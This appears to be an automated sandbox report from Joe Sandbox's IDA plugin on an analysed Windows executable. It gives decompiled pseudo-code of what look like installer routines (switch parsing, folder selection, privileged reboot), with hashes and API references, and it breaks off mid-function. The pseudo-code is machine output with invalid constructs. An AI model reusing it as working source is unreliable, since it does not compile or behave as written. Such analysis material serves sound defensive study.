Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 57a2465b53085a08bb763e72ed16563d5629bb55b3c505bd2d116222fe28d70b
Instruction ID: ab36d7f57989ce697852df03e7e491199f882d5aacfae2b889bd3e1ac3464d5d
Opcode Fuzzy Hash: 57a2465b53085a08bb763e72ed16563d5629bb55b3c505bd2d116222fe28d70b
Instruction Fuzzy Hash: 79B0123608820CB7DF001FC2EC09F853F1DE7C6771F140000F60C450508A72941096A6

Uniqueness

Uniqueness Score: -1.00%

Function 00944CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00944CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00944cc8
0x00944ccf

APIs

GlobalFree.KERNELBASE ref: 00944CC8

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: cdc2986b2fa4d1473fedbcbe994e38ec93723bf3ae67f85a6a2228b1d1deb482
Instruction ID: 8bc44e673db254caec15e31b44fba7e19c90828084cd2ea665a55750931c5bb6
Opcode Fuzzy Hash: cdc2986b2fa4d1473fedbcbe994e38ec93723bf3ae67f85a6a2228b1d1deb482
Instruction Fuzzy Hash: 8DB0123104410CB78F001B42EC08C453F1DD6C22707000010F50C410218B3398119585

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00945C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00945C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x948004; // 0xec518a5e
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00946CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00946E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x948004; // 0xec518a5e
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0094597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E009444B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x949124 = E00946285();
									_t75 = 0;
								}
								return E00946CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E009444B9(0, 0x521, 0x941140, 0, 0x40, 0);
												_t85 =  *0x948588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0094667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0094667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00945C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00941680(0x948c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0094667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0094667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x948a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00945C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x948b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x948a3a;
																}
																E00941680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0094658A(_t218, 0x104, 0x941140);
																if(E009431E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x948a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x948a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x948a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x948a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x948a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x949a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x949a2c =  *0x949a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x948d48 =  *0x948d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x949a2c =  *0x949a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x949a2c =  *0x949a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x948d48 =  *0x948d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x949a2c =  *0x949a2c | 0x00000004;
																										L70:
																										 *0x948a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x949a2c = 3;
																	 *0x948a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x948a2c != 0 &&  *0x948b3e == 0) {
						if(GetModuleFileNameA( *0x949a3c, 0x948b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E009466C8(0x948b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00945c9e
0x00945ca9
0x00945cb0
0x00945cb3
0x00945cb6
0x00945cb7
0x00945cb8
0x00945cbd
0x00946204
0x00945ccb
0x00000000
0x00945ccb
0x00945cd3
0x00945cd7
0x00945cf4
0x00000000
0x00945cf4
0x00945cf8
0x00945d00
0x00000000
0x00945d06
0x00945d06
0x00945d0e
0x00945d10
0x00945d12
0x00945d14
0x00945d15
0x00945d17
0x00945d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00945d19
0x00945d19
0x00945d1d
0x00000000
0x00945d3f
0x00945d3f
0x00945d4b
0x00945d4b
0x00945d4f
0x00945d8d
0x00000000
0x00945d93
0x00945d93
0x00945d9a
0x00945d9d
0x00945d9e
0x00000000
0x00945d9e
0x00945d51
0x00945d5b
0x00945d72
0x009460fb
0x009460fb
0x00946207
0x0094620a
0x0094620b
0x0094620e
0x00946217
0x00945d78
0x00945d78
0x00945d80
0x00945d83
0x00945d84
0x00000000
0x00945d84
0x00945d5d
0x00945d5f
0x00945d62
0x00945d68
0x00945d64
0x00945d64
0x00945d64
0x00000000
0x00945d62
0x00945d5b
0x00945d4f
0x00945d1d
0x00000000
0x00945d9f
0x00945d9f
0x00945da5
0x00945dab
0x00945dba
0x00946218
0x0094621d
0x00946220
0x00946221
0x00946229
0x00946230
0x00946247
0x0094626a
0x00946272
0x00946249
0x00946255
0x0094625f
0x00946264
0x00946264
0x00946284
0x00945dc0
0x00945dc0
0x00945dca
0x00945e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00945dcc
0x00945dce
0x00945e24
0x00945e24
0x00945e2c
0x00945e47
0x00945e4a
0x009461d2
0x009461e2
0x009461e7
0x009461ee
0x009461f1
0x009461f1
0x009461f8
0x009461f8
0x00945e50
0x00945e53
0x00946109
0x0094611f
0x00000000
0x00946125
0x00946137
0x0094613a
0x0094613c
0x0094613e
0x0094613e
0x00946141
0x00946141
0x00946143
0x00946144
0x0094614a
0x00000000
0x00946150
0x00946152
0x0094615c
0x00946170
0x00946172
0x0094617c
0x00946190
0x00946190
0x00946196
0x009461a5
0x00000000
0x009461ab
0x009461b9
0x009461c6
0x009461c6
0x0094617e
0x00946180
0x0094618a
0x00000000
0x00000000
0x00000000
0x00000000
0x0094618a
0x0094615e
0x00946160
0x0094616a
0x00000000
0x00000000
0x00000000
0x00000000
0x0094616a
0x0094615c
0x0094614a
0x0094610b
0x0094610e
0x0094610e
0x00000000
0x00945e59
0x00945e59
0x00945e5c
0x0094604f
0x00946056
0x00000000
0x0094605c
0x0094606e
0x00946071
0x00946073
0x00946075
0x00946075
0x00946078
0x00946078
0x0094607a
0x0094607b
0x00946081
0x00000000
0x00946087
0x00946087
0x0094608d
0x0094609c
0x00000000
0x009460a2
0x009460aa
0x009460b2
0x009460b7
0x009460bd
0x009460bf
0x009460bf
0x009460d6
0x009460e0
0x009460e7
0x009460f5
0x00000000
0x00000000
0x00000000
0x00000000
0x009460f5
0x0094609c
0x00946081
0x00945e62
0x00945e62
0x00945e65
0x00945fd3
0x00945fe9
0x00000000
0x00945fef
0x00945fef
0x00945ff7
0x00945ffd
0x00946003
0x00946006
0x00946011
0x00946014
0x0094603d
0x00946016
0x00946018
0x00946019
0x0094601b
0x00946033
0x0094601d
0x00946020
0x00946029
0x00946022
0x00946022
0x00946022
0x00946020
0x0094601b
0x00946042
0x00946044
0x00946046
0x0094604a
0x00945ff7
0x00945fd5
0x00945fd8
0x00945fd8
0x00000000
0x00945e6b
0x00945e6b
0x00945e6e
0x00945f8b
0x00945f99
0x00000000
0x00945f9f
0x00945fa7
0x00945faf
0x00000000
0x00945fb1
0x00945fb3
0x00000000
0x00945fb5
0x00945fb7
0x00000000
0x00945fb9
0x00000000
0x00945fb9
0x00945fb7
0x00945fb3
0x00945faf
0x00945f8d
0x00945f8d
0x00945f8d
0x00945f8f
0x00945fc1
0x00945fc1
0x00945fc1
0x00000000
0x00945e74
0x00945e74
0x00945e77
0x00945ea0
0x00945ebd
0x00945f79
0x00000000
0x00945f7f
0x00945ec3
0x00945ec3
0x00945ecc
0x00945ed4
0x00945ed6
0x00945edc
0x00945edf
0x00945eea
0x00945eed
0x00945f3f
0x00945f40
0x00000000
0x00945eef
0x00945eef
0x00945ef2
0x00945f34
0x00945ef4
0x00945ef4
0x00945ef7
0x00945f2b
0x00000000
0x00945ef9
0x00945ef9
0x00945efc
0x00945f22
0x00000000
0x00945efe
0x00945eff
0x00945f02
0x00945f16
0x00945f04
0x00945f07
0x00945f0d
0x00945f46
0x00945f46
0x00945f09
0x00945f09
0x00945f09
0x00945f07
0x00945f02
0x00945efc
0x00945ef7
0x00945ef2
0x00945f4c
0x00945f4e
0x00945f50
0x00945f54
0x00945ed4
0x00945ea2
0x00945ea4
0x00945eaf
0x00945eaf
0x00000000
0x00945e79
0x00945e7d
0x00000000
0x00945e83
0x00945e83
0x00945e83
0x00945e85
0x00945e85
0x00945e8e
0x00000000
0x00945e94
0x00000000
0x00945e94
0x00945e8e
0x00945e7d
0x00945e77
0x00945e6e
0x00945e65
0x00945e5c
0x00000000
0x00000000
0x00000000
0x00945dd0
0x00945dd0
0x00945dd0
0x00000000
0x00945dd0
0x00945dce
0x00945dca
0x00945dba
0x00000000
0x00945d00
0x00945dd9
0x00945e04
0x009461fe
0x00945e0a
0x00945e0c
0x00945e17
0x00945e17
0x00945e04
0x00946200
0x00946200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00945CEE
GetModuleFileNameA.KERNEL32(00948B3E,00000104,00000000,?,?), ref: 00945DFC
CharUpperA.USER32(?), ref: 00945E3E
CharUpperA.USER32(-00000052), ref: 00945EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00945F6F
CharUpperA.USER32(?), ref: 00945FA7
CharUpperA.USER32(-0000004E), ref: 00946008
CharUpperA.USER32(?), ref: 009460AA
CloseHandle.KERNEL32(00000000,00941140,00000000,00000040,00000000), ref: 009461F1
ExitProcess.KERNEL32 ref: 009461F8

Strings

", xrefs: 00945D78
RegServer, xrefs: 00945F66
:, xrefs: 00946118
", xrefs: 0094612D

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: a9a6199efc161993896c53440d242e58b2c0f1b1ab485148b7a12bff9eb34654
Instruction ID: be07c3040db32188d55fdd666d6f9cd7de407203f05c189c139dd45d521ea753
Opcode Fuzzy Hash: a9a6199efc161993896c53440d242e58b2c0f1b1ab485148b7a12bff9eb34654
Instruction Fuzzy Hash: EAD16C71A18A446FDF358BB89C48FBB3769AB17304F1544EAC4C6C7193D6B48E86DB02

Uniqueness

Uniqueness Score: -1.00%

Function 00941F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00941F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x949a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x948004; // 0xec518a5e
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E009444B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00946CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E009444B9(0, 0x522, 0x941140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00941EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00941f90
0x00941f90
0x00941f93
0x00941f98
0x00941fa4
0x00941fa7
0x00941fc5
0x00941fcd
0x00941fdb
0x00941ee5
0x00941eea
0x00941ef1
0x00941ef4
0x00941f0c
0x00941f2e
0x00941f3a
0x00941f46
0x00941f4d
0x00941f58
0x00941f60
0x00941f61
0x00941f62
0x00941f75
0x00941f80
0x00941f77
0x00941f77
0x00000000
0x00941f77
0x00941f64
0x00941f64
0x00000000
0x00941f64
0x00941f0e
0x00941f0e
0x00941f13
0x00941f13
0x00941f14
0x00941f14
0x00941f16
0x00941f17
0x00941f1a
0x00941f1f
0x00941f1f
0x00941f86
0x00941f8f
0x00941fcf
0x00941fd3
0x00000000
0x00941fd3
0x00941fa9
0x00941fb4
0x00941fbb
0x00941fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00941fc3
0x00941f9a
0x00941f9a
0x00941fa2
0x00941fd9
0x00941fda
0x00000000
0x00000000
0x00000000
0x00941fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00941EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00941F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00941FD3

Strings

SeShutdownPrivilege, xrefs: 00941F28

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 4daa970d68e2d224552eb895616cb975bfb18162b0cabf5b43795ba78632f23a
Instruction ID: 9688913b7fdda8229bbce872f7226e8a7f533d09831a3ed66324f02744e877b8
Opcode Fuzzy Hash: 4daa970d68e2d224552eb895616cb975bfb18162b0cabf5b43795ba78632f23a
Instruction Fuzzy Hash: 5A213875B582057BDB305BA1DC4AFBF77BCEBCBB10F100058FA02E2081D7348886A262

Uniqueness

Uniqueness Score: -1.00%

Function 00946CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00946CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00946cf7
0x00946d00
0x00946d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00946E26,00941000), ref: 00946CF7
UnhandledExceptionFilter.KERNEL32(00946E26,?,00946E26,00941000), ref: 00946D00
GetCurrentProcess.KERNEL32(C0000409,?,00946E26,00941000), ref: 00946D0B
TerminateProcess.KERNEL32(00000000,?,00946E26,00941000), ref: 00946D12

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 6eda2d861aeb96bbf3794e1bb51e0b47b7be2f073d20f57d83238441f5396713
Instruction ID: c875e98a41cdab2b2a0d235d375e3a5b3cb09945c6734157cf4ea0f22094b3e7
Opcode Fuzzy Hash: 6eda2d861aeb96bbf3794e1bb51e0b47b7be2f073d20f57d83238441f5396713
Instruction Fuzzy Hash: 54D0C93A09C108BBEB002BE1EC0CE593F28EB4E222F444004F31982020DA324851EB62

Uniqueness

Uniqueness Score: -1.00%

Function 00943210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00943210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E009443D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lenta");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x949a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x9491e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E009444B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x9491e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x9491e5 - 3;
						if(_t49 - 0x9491e5 < 3) {
							goto L32;
						}
						_t24 =  *0x9491e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x9491e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0094658A(0x9491e4, 0x104, 0x941140);
								_t27 = E009458C8(0x9491e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x9491e4 - 0x5c;
									if( *0x9491e4 != 0x5c) {
										L30:
										_t30 = E0094597D(0x9491e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x9491e5 - 0x5c;
									if( *0x9491e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E009444B9(_t64, 0x54a, 0x9491e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x9491e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x9491e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x9491e4 - 0x5c;
						if( *0x9491e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x949124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x949a3c, 0x3e8, 0x948598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
